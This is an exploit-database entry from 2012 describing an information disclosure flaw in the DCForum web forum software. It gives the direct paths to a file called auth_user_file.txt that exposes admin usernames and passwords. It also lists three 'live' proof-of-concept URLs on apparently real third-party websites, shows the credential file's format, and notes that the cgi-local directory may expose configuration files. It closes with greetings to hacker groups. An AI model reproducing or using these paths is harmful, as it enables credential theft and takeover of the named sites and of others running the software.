DCForum Remote Admin Privilege Compromise Vulnerability

2012-11-02T00:00:00
ID 1337DAY-ID-19682
Type zdt
Reporter r45c4l
Modified 2012-11-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: DCForum Information Disclosure
# Date: 01/11/2012
# Author: r45c4l (@r45c4l)
# Email: [email protected]
# Script url: http://webscripts.softpedia.com/script/Discussion-Boards/DCForum-20872.html
# Version: N/A
# Category: WebApp
# CVE : ()
 
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
Product Description :
 
DCForum is a complete web conferencing software for building and managing an online discussion community.
 

  
=================Exploit=================================================
                                    ---ICW---
 [ EXPL0!T ]
 
 
 p0c - www.site.com/cgi-bin/User_info/auth_user_file.txt
       www.site.com/cgi-bin/dcforum/User_info/auth_user_file.txt
 
 Live p0c : http://www.lukemastin.com/testing/parents/cgi-bin/User_info/auth_user_file.txt
	    http://www.asklasikdocs.com/cgi-local/Copyforum/User_info/auth_user_file.txt
	    http://www.firstfloorcapital.com/cgi-bin/dcforum/User_info/auth_user_file.txt
 
 
 Example of auth_user_file.txt:
 
 password|admin|First_Name|Last_Name|[email protected]|on
 password|admin|admin|First_Name|Last_Name|[email protected]|on


In some cases http://www.site.com/cgi-local will index all the setup and configuration files


===========================================================================
Greetz to : Beenu Arora, d3hydr8, Hardeep Singh, micr0, sam, Sai Satish
            All members of ICW, AH and G4H, and all Indian Hackers
 
 
                     
Special Greetz to :  b4ltazar and s1nn3r and the entire darkc0de.com guys
             
 
                                    === End () ====

#  0day.today [2018-01-03]  #